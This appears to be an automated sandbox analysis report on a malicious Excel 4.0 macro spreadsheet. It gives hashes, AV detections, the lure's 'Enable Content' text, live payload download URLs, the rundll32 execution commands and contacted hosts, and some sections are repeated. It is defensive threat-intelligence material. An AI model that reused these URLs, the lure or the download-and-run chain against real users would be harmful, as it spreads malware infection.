Analysis Report document-933340782.xlsm

Overview

General Information

Sample Name:	document-933340782.xlsm
Analysis ID:	383151
MD5:	766f5bb363db9a966b613a42a118798a
SHA1:	57e67742fd7e7fa0badddca5b2cceb4cf09048a7
SHA256:	9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://tienda.ventadigital.com.ar/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://nellaimasthanbiryani.com/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://thirdstringcalifornia.com/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://holmesservices.mobiledevsite.co/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://kristen.sbddev.com/ds/2803.gif	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: holmesservices.mobiledevsite.co

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: document-933340782.xlsm	Virustotal: Detection: 37%	Perma Link
Source: document-933340782.xlsm	Metadefender: Detection: 16%	Perma Link
Source: document-933340782.xlsm	ReversingLabs: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: kristen.sbddev.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 143.95.33.96 143.95.33.96
Source: Joe Sandbox View	IP Address: 66.36.231.40 66.36.231.40

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive

Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: kristen.sbddev.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableConnection: Keep-AliveX-Powered-By: PHP/7.2.34Content-Type: text/html; charset=UTF-8Content-Length: 97Content-Encoding: gzipVary: Accept-EncodingDate: Wed, 07 Apr 2021 08:46:55 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 b2 30 30 d6 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 8c 1f 10 3a 4f 00 00 00 Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)700KLS(O,V/QHPS(,V(N-*K-:O

Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2100437884.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 :: Once You have Enable Editing, please ell r, i m
Source: Screenshot number: 8	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 12	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: document-933340782.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: document-933340782.xlsm

Initial sample: Sheet size: 53161

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal88.expl.evad.winXLSM@11/12@5/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$document-933340782.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCB2B.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer

Source: document-933340782.xlsm	Virustotal: Detection: 37%
Source: document-933340782.xlsm	Metadefender: Detection: 16%
Source: document-933340782.xlsm	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-933340782.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
143.95.33.96	thirdstringcalifornia.com	United States	62729	ASMALLORANGE1US	false
66.36.231.40	nellaimasthanbiryani.com	United States	14361	HOPONE-GLOBALUS	false
50.23.112.133	kristen.sbddev.com	United States	36351	SOFTLAYERUS	false
31.170.166.139	tienda.ventadigital.com.ar	United States	47583	AS-HOSTINGERLT	false
103.68.166.129	holmesservices.mobiledevsite.co	Singapore	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true

Contacted Domains

Name	IP	Active
kristen.sbddev.com	50.23.112.133	true
holmesservices.mobiledevsite.co	103.68.166.129	true
tienda.ventadigital.com.ar	31.170.166.139	true
nellaimasthanbiryani.com	66.36.231.40	true
thirdstringcalifornia.com	143.95.33.96	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://tienda.ventadigital.com.ar/ds/2803.gif	true	Avira URL Cloud: malware	unknown
http://nellaimasthanbiryani.com/ds/2803.gif	true	Avira URL Cloud: malware	unknown
http://thirdstringcalifornia.com/ds/2803.gif	true	Avira URL Cloud: malware	unknown
http://holmesservices.mobiledevsite.co/ds/2803.gif	true	Avira URL Cloud: malware	unknown
http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi	false	Avira URL Cloud: safe	unknown
http://kristen.sbddev.com/ds/2803.gif	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://tienda.ventadigital.com.ar/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://nellaimasthanbiryani.com/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://thirdstringcalifornia.com/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://holmesservices.mobiledevsite.co/ds/2803.gif	Avira URL Cloud: Label: malware
Source: http://kristen.sbddev.com/ds/2803.gif	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: holmesservices.mobiledevsite.co

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: document-933340782.xlsm	Virustotal: Detection: 37%	Perma Link
Source: document-933340782.xlsm	Metadefender: Detection: 16%	Perma Link
Source: document-933340782.xlsm	ReversingLabs: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: kristen.sbddev.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 143.95.33.96 143.95.33.96
Source: Joe Sandbox View	IP Address: 66.36.231.40 66.36.231.40

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
